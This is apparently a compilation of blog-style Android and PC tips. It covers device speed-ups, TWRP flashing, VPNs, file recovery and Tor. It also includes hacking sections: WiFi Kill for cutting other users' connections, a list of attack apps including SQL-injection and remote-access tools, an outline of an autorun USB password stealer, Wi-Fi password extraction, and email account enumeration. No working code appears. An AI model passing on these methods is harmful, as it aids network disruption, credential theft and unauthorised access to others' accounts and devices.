Tap the Clear memory button and any background processes that are running unnecessarily will be closed down.

6. Restart your device

A quick and simple fix for a slow device is to simply restart it.

This can clear out the cache, stop unnecessary tasks from running, and get things running smoothly again.

Just hold down the power button, select the Restart option, and then tap OK to confirm.
_________________________

HOW TO REMOTELY TURN OFF ANY ANDROID BY SENDING SMS?

The method is very simple and straight and need just 3-4 minutes to setup in your android device.

And the app that you will be installing will let you to shutdown your android by sending SMS to the android that you have configured with the app.

Just follow some simple steps below to proceed.

First of all you need an rooted android

Now download Remote Power Off zip file in your computer and extracts it in the computer and then in the extract file navigate folder > System>App> Remoteturnoff.apk.

http://goo.gl/JFDXaS

And then transfer the apk file in your android.

Now install this app in your android device from the apk that you have transfer.

Now you will type the current password that is null and then type the new password and confirm it again and click on change secret code.

Now go to super user app and grant this app super user permission.

Thats it you are done, now you just need to send the secret code as a SMS to your the android when you want to remotely turn it off.
_________________________

UNLOCKING ANDROID TABLETS AND PHONES WITHOUT PASSWORD.

Use this when you forgot the password of your android phone ..

To Unlock Password of Android Phone And Tablet.

1.First of all Power Off your device

2.After this just press Up Volume Key and hold it.

3.Now press the power button and hold it.

4.It will start a secret terminal.

5.You can use home button or volume button for go up and down.

6.You can use option DELETE ALL USER DATA.

7.It will take some time, and problem is solved.

WARNING :- if u use this trick then the data of your mobile will be lost
_________________________

HOW TO INSTALL TWRP?

An essential tool for anybody that loves to modify their Android device is a good custom recovery.

Download TWRP for your device:

https://twrp.me/Devices/

Now we will go through a couple different methods that you can use to install the TWRP recovery. Before we get started, go ahead and enable USB Debugging on your device.

Install ADB and Fastboot drivers

To get everything setup properly, you can use this very simple tool created by XDA member Snoop05. Download an install using the guide fro in this XDA thread.

Download ADB Installer: https://forum.xda-developers.com/showthread.php?p=48915118#post48915118

Enable USB Debugging

To enable USB debugging, navigate to Settings > Developer Options > USB Debugging

Install via ADB

Open the folder where your TWRP Recovery .img file is saved.

Then open a CMD window inside that folder. To do that, Shift + Right click on any empty white space inside the folder and then select Open command window here.

Connect your Android device to the PC. Type the following into the command window to boot your device into bootloader/fastboot mode:

adb reboot bootloader

└ If your asks for permission to “Allow USB debugging”, tap OK.

Once your device boots into bootloader mode, type this into the command line.

fastboot flash recovery twrp-2.8.x.x-xxx.img

└ Here modify twrp.img with the name of your TWRP recovery .img file.

Once TWRP is successfully flashed on your device, type this final command to reboot your device.

fastboot reboot
_________________________

WHAT IS EXPOSED FRAMEWORK FOR ANDROID?

Android is known for its extensive customization potential but unless you have a rooted device, you can only customize it using widgets and different home screen launcher apps.

Rooting your device further expands the potential, giving you the ability to run apps that modify the core of the OS and do things not otherwise possible on it.

Unlocking the bootloader and flashing a custom recovery takes you to a whole next level, allowing you to install custom mods and even full ROMs that can drastically change your user experience.

Wouldn’t it be great if only rooting would allow you to get the features that are otherwise available only via mods and custom ROMs? Xposed framework is a groundbreaking development that lets you do just that.

It’s easy to install and configure, and already has a plethora of modules available that bring functionality to your device that otherwise requires flashing a custom ROM or mod from recovery.

Download Xposed Installer:
http://xposed-installer.en.uptodown.com/android

About Xposed Module Repository:
http://repo.xposed.info/module/de.robv.android.xposed.installer_________________________

WHAT IS WI-FI KILL?

WiFi Kill pro is an android tool that you can use to disable internet connection for a device on constant WiFi network.

It is a light-weight tool with simple interface.

That is, anyone can use this app without any user guides.

WiFiKill cannot terminate the internet connection of that device, it can block the packet data going to device.

To run the app in full screen, go to the “Preferences” and then check the “Full Screen” option.

To show the network names on the device list, go to “Preferences” and then check “Show network names” option.

To show MAC address on the device list, go to “Preferences” and then check “Show MAC” option.

To show vendor of the NIC on the device list, go to “Preferences” and then check “Show NIC Manufacturer” option.

Download WiFi Kill Pro: https://wifikillapk.com
_________________________

BEST ANDROID APP FOR PENETRATION.

1. WiFi-Kill: Kill Other People Devices Connection on Wifi

Wifi kill android app stop other people wifi connection on wifi network.

This is work like a netcut in windows.with the help of wifi kill you also have a feature to stop all of connections which wifi network you joined.below am giving you to downloading link of the wifi kill pro, so have enjoy.

2.Dsploit: Most Wanted Hacking App :Dsploit is best android hacking tool for professional hackers.This is all in one tool for penetration testers and hackers.

3.Droidsqli Android App : Attack Sql Injection Website,Droidsqli android app hack website through sqli attack method.This android app tell you website admin username and password.Haackers use this android for hacking websites.

4.Androrat :Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

5.Burp Suite :Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.
_________________________

HOW TO SET-UP VPN ON ANDROID WITHOUT ANY APP?

The method is very simple and easy and just require initial set up to set VPN permanently in your android device.

You just have to follow some simple steps below to proceed.

First of all in your android device navigate to Menu -> Settings.

Now click on more option there.

Now click on VPN and a blank setting screen will appear.

Now click on ‘+’ button there at the right top corner.

Now enter the name of VPN as Techhacks and at the type select the type you want to request to server and at the last field enter any VPN address that you want to set in your android device.

After filling up all the fields click on save button.

Now the VPN will appear tap on it and enter the username and password in it and click on connect.

Now in your notification bar you will see running VPN service without any third party app in your android device.
_________________________

BEST APP TO SURF ANONYMOUSLY IN ANDROID.

#1 Hotspot Shield VPN Proxy

This is one of the best VPN Proxy apps that will help you to surf anonymously in your android device.

This app provides banking-level HTTPS encryption to secure the WiFi connection so that the outgoing data can be protected from the hackers.

#2 Hola Free VPN :

This app is working perfectly with a user from previous years.This app allows you to surf through different random servers. Also along with securing data and providing access to geographically blocked content, Hola Free VPN speeds up browsing by selecting and connecting to the nearest and fastest servers automatically from the list of servers located in 190+ countries and helps insurf secretly.

#3 Super VPN :

This is an another best app To Surf Anonymously In Android. This app encrypts the traffic to keep the transmitted and received data safe from 3rd party tracking without having to register or configure the settings of the device in a special way.

#4 SecureLine VPN :

This is a nice app developed by Avast Inc. They are famous for developing one of the best antiviruses worldwide and the private VPN Tunnel of SecureLine VPN encrypts the data using IPsec protocol which makes it really tough for hackers to snip the data through public WiFi hotspots networks.

#5 Spotflux VPN :

This is a VPN app which take cares of the privacy of data by providing 2 levels of protection and reduces the consumption of bandwidth by compressing data over a network. That makes it a suitable choice for those who are interested in securing their data as well as maximizing the data plan.
_________________________

HOW TO DATA RECOVER FILES FROM CORRUPTED USB DEVICE AND MEMORY CARD?

Step 1 First download M3 Data Recovery software and install in your Windows or Mac.

Step 2 Once your download complete after connect your Pen Drive or Memory Card to your computer.

Step 3 Now run the program and click Data Recovery module.

Step 4 Choose your pen drive or memory card and then click Next> to search your lost data.

Step 5 M3 Data Recovery will analyze every sector on the selected volume and then find the lost files.

Step 6 When the scan finishes, you will be able to preview found files. Then select files you want to recover and save them.
_________________________

HOW TO CHANGE SERIAL NUMBER OF YOUR ANDROID PHONES?

Steps To Change Serial Number of Your Android:

1. First of all you need a rooted android as Xposed installer can be only installed on a rooted android, so Root your android to proceed.

2. After rooting your android device you have to install the Xposed installer on your android

3. Now after having Xposed framework on your android, the only thing you need is the Xposed module Serial Number Changer that will allow you to change the serial number of your android device.

4. Now install the app and launch it in your android and you just need to provide super user access to the app to proceed and after that you need to reboot your android device for the proper working of the android.

5. Now launch the app and then enter the serial number that you want to set on your device.
_________________________

RECOVER WI-FI PASSWORD USING ANDROID.

#1 Using WiFi Key Recovery:

Step 1. First of all, you need to root your android as the app will work only if you have root access in your device so visit the guide Root any android safely.

Step 2. After rooting your device download and install the app Wifi Key Recovery in your android.

Step 3. Now launch the app and you will see the popup regarding permission for super user access grant it the permission.

Step 4. Now you will see all the wifi networks that you had connected with your android device and their passwords too along with them.

Step 5. Now just copy the password and get login into that wifi and that’s it password will be recovered and you can now even change the password of that network by visiting the admin panel of a network.
_________________________

HOW TO RECOVER DELETED FILES ON ANDROID?

Sometimes we remove some important files or data.

As many people use the android smartphone and keep their important daily use files or data in it.

But what if you delete some valuable data on your android ? In PC you can recover data, when you delete it and you can easily restore it from Recycle Bin.

Moreover, when you permanently deletes files on your PC then you can easily recover them by any hard drive recovery tool.

top best android data recovery tools that will help you to recover deleted files on android.

#1 Dumpster :

The dumpster is Just like the Recycle Bin on your desktop computer. It is one of the best tools for recovering accidentally deleted files from your smart Android. It can recover all deleted files on your android. It also very easy to use because of it’s user-friendly interface.

#2 ES File Explorer :

The another method to restore deleted files is one of the best android file managers. This file manager is full of features and one of them is Recycle Bin. I will also recommend you to use this application as the file manager.

#3 Recover Files from Android SD Card Using PC :

Sometimes you accidentally format your SD card on you android or sometimes your SD card gets corrupted. It can recover photos and videos from SD cards on Android devices, as well as contacts and messages on SIM cards.

With this, you can easily recover deleted files from your Android Smartphone.
_________________________

USE BACKTRACK ON ANDROID.

BackTrack is one of my favorite OS. First reason is it is made by world class hackers and second one is all hacking tools are available and last and third one, it is flavor of Linux.

I can use it only on PC, Android is booming now these days… Now you can Install Back Track Linux OS on Android smartphones and tablets.

Now it is possible to install and run Backtrack on your Android devices.

BUSY BOX : It acts like a installer and uninstaller.it needs root permission to run.

it has CPU cores and can run Linux kernels on android.S

Superuser : This app just grants a superuser power to your phone just like su does for Linux.

Terminal Emulator : Terminal Emulator is app that runs a terminal console in android.

Android VNC : Android VNC is a tool for viewing VNC in Android.
_________________________

HOW TO RECEIVE ALL YOUR ANDROID SMS ON YOUR PC?

We are again here with a cool android trick that is How To Receive All Your Android SMS On PC.

Many of you works on your PC for a long time and at that time it looks quite difficult to pickup android and read out every SMS received on it.

Mostly when you device is on charging and you working at distance from it

Steps To Get All Your Android SMS On PC:-

1. First of all download and install app Mighty Text in your android device.1

2. Now in your Google Chrome browser add the extension Mighty Text.

3. Now open the app you will need an initial pair up with your PC as it will be done over wifi network on which both the devices being connected.3

4. Now when you setup is done now you will see your android name on the icon when you click on it.4

5. Thats it all done, now when you android receive any SMS it will transfer on your extension of PC and you can read it there.

With this setup you can get all your messages on your computer screen and can get rid of picking up your android again and again to read each SMS, just tap on the notification and watch out every message received.
_________________________

HOW TO REMOVE MEMORY CARD PASSWORD?

Today every mobile user weather it is android,ios or any other use memory card in their devices. And this small chip is a device that can store million bytes of data.

Sometime we protect our memory card with password, but forgot that. In that case you will have trouble to access your memory card or copy paste anything in it. So in this post i will tell you a trick which will remove memory card password. Just follow the below to proceed.

The method to remove password from memory card is very simple and easy and this can be done by two ways, either from Pc or from android device. Also you can even view your current password too. Just follow the below steps to proceed.

Steps To View & Remove Password Of Memory Card Using Android:-

First of all insert your password protected memory card in your android device.

Now download the ES file Explorer in your android and open it.

Now there go to system folder and locate the file mmcstore.

Now rename it as mmcstore.txt and open it.

Now there you can see the current password of your memory card,note it down.
Now in memory card option click on remove password and then paste the password that you have noted.

Thats it you are done.

Steps To Remove Password Of Memory Card Using PC

With this method all your data will get lost as you will be going to format your memory card in this method, so i recommend to use above method and if it doesn’t work then go for this method

First of all insert your memory card in any of smartphone.

Now connect the phone with computer using USB cable.

Now right click on memory card drive in your Pc and click on format(It will not ask any password to format).

Thats it by formatting your memory card password will also get removed and you can now access your memory card completely.

So above are the two ways for How To Remove Password Of Memory Card. By these ways you can easily view or remove password from memory card and can easily share data from it. And this method is such a simple that even non tech person can also do this by just following the simple steps discussed above. enjoy 😉
_________________________

WHAT IS PENDRIVE HACKING?

Windows allows the storage of the passwords, as do modern browsers. While this feature is convenient for users, it has imposed itself as a big security risk among organizations.

We know that browsers store most passwords on daily basis, like MSN messenger, Yahoo, Facebook passwords, etc. Most people lack time and ask their browsers to save their passwords.

As we know, there are many tools available to recover saved passwords, so in this article I will explain to you how to make a USB password stealer and steal saved passwords.

Just to explain the concept, we are going to collect some password stealing tools, tools that are freely available on the internet and capable of stealing the passwords stored in the browsers or other windows files.

Then, we create a batch program that will execute these combined programs and store the stolen usernames and passwords in a text file.

To further spice up the penetration testing demonstration, we will also make this batch file execute as an auto-run for the USB stick, effectively stealing the passwords as we plug it in.

Download tools from here: http://securityxploded.com
_________________________

HOW TO CHECK ?, IF AN EMAIL ADDRESS IS VALID OR NOT.

The method is simple and easy to understand
and you can quickly use it to trace out any email address.

You just need to follow some guidelines a below to proceed.

#1. Checking Validation Of Gmail Email Account

Step 1. First of all copy the email address that you want to check. Now visit the password assistance page from here.

Https://accounts.google.com/signing/recovery

Step 2. There choose I don’t know my password option.

Now paste the email address that you want to scan and click on continue.

Step 3. If the account is not valid then google will show it and you will be done with this.

Checking Validation Of Gmail Email Account On the other hand, if you are searching for a valid email
account it will ask you to enter the last password you remember.

WHAT IS DARKNET ?

Darknet is an overlay network that can only be accessed using specific software,configurations,or authorization.

It is part of the Deep Web, because its contents are not accessible through search engines.

But it is something more, it is anonymous.

It hosts anonymous websites.

Yeah, you wouldn’t know who the owner is unless he explicitly reveal his information.

It offers full anonymity to users too.

Darknet anonymity is usually achieved using an onion network.

Iam sure you have cut an onion once in your lifetime and you had been crazy about the number of layers it has, same happens when you use an onion network.

There are number of encryption layers that hide your tuly identity.

USE OF DARKNET:-

Ok, so you have grasped what Darknet is, Now you may ask me why should you use it.

Well the reason could be any of them:
To better protect the privacy right of citizens from targeted and mass surveillance.

Whistleblowing and news leaks
Hacking and Computer Crime.

Maybe,you may want to chat with the most dangerous of hackers.

Sale of restricted goods.

File sharing.

HOW TO ACCESS DARKNET ?

Well the most popular way to access Darknet is by using TOR browser.

Technically, it stands for The Onion Router and it is as simple as installing a new browser.

After that you would need a URL or directory that contains URLs to different websites or class of websites so that you know what to type in into the browser’s address bar.

You can easily get URLs in Onion Directory of
Darknet at http://am4wuhz3zifexz5u.onion/ or just
google for DarknetSites.
Make sure you use TOR browser.

HOW TO BE ANONYMOUS ON INTERNET…..

IF YOU WANT TO ANONYMOUS ON INTERNET,YOU HAVE TO USE TOR(THE ONION ROUTER) BROWSER.

THEN YOU CAN ANONYMOUS ON INTERNET.

USING TOR BROWSER YOU CAN ALSO ACCESS DARK WEB.

IF YOU WANT TO USE TOR BROWSER ON ANDROID PHONES,THEN FIRST OF ALL YOU HAVE TO OPEN PLAY STORE AND CLICK ON TO SEARCH BOX AND TYPE ORFOX .

THEN YOU WILL SEE ORFOX APP ,NOW INSTALL THIS APP,AND ALSO YOU HAVE INSTALL ORBOT ON YOUR ANDROID PHONES FROM PLAY STORE.

AFTER INSTALLATION OF THESE APPS ,OPEN THE ORBOT APP AND CLICK ON START,AND TURN ON VPN MODE.

THEN OPEN ORFOX APP AND SEARCH EVERYTHING BY THIS APP.AND YOU ALSO HAVE TO KNOW, THE SEARCH ENGINE OF THIS BROWSER IS DUCKDUCKGO……

SO NOW YOU ARE ANONYMOUS……

  1. DOWNLOAD LINK OF ORFOX BROWSER:-https://play.google.com/store/search?q=Orfox
  2. DOWNLOAD LINK OF ORBOT BROWSER:-https://play.google.com/store/search?q=Orbot

AND IF YOU WANT TO USE TOR ON YOUR PC THEN OPEN CHROME AND CLICK ON SEARCH BOX AND TYPE DOWNLOAD TOR,THEN YOU WILL SEE DOWNLOADING OPTION ON YOUR SCREEN,NOW CLICK ON FIRST LINK AND JUST DOWNLOAD IT AND ENJOY.